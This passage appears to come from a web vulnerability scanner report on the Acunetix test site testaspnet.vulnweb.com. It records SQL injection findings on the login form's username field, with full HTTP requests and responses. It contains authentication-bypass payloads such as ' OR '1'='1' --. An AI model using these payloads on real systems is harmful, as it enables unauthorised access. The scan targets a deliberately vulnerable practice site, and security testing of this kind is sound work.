align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/login.aspx
Method	POST
Parameter	tbUsername
Attack	YMEgZXeH' OR '1'='1' --
Evidence
Show / hide Request and Response
Request Header - size: 577 bytes.	POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1173 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/login.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,173 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM%2FuCBtd%2Bn7UP&tbUsername=YMEgZXeH%27+AND+%271%27%3D%271%27+--+&tbPassword=&btnLogin=Login
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:43:37 GMT Content-Length: 13437
Response Body - size: 13,437 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM/uCBtd+n7UP" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" value="YMEgZXeH' AND '1'='1' -- " id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/login.aspx
Method	POST
Parameter	tbUsername
Attack	ZAP' OR '1'='1' --
Evidence
Show / hide Request and Response
Request Header - size: 405 bytes.	POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/login.aspx Content-Length: 1190 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,190 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM%2FuCBtd%2Bn7UP&tbUsername=ZAP%27+AND+%271%27%3D%271%27+--+&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:43:31 GMT Content-Length: 13450
Response Body - size: 13,450 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM/uCBtd+n7UP" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" value="ZAP' AND '1'='1' -- " id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" 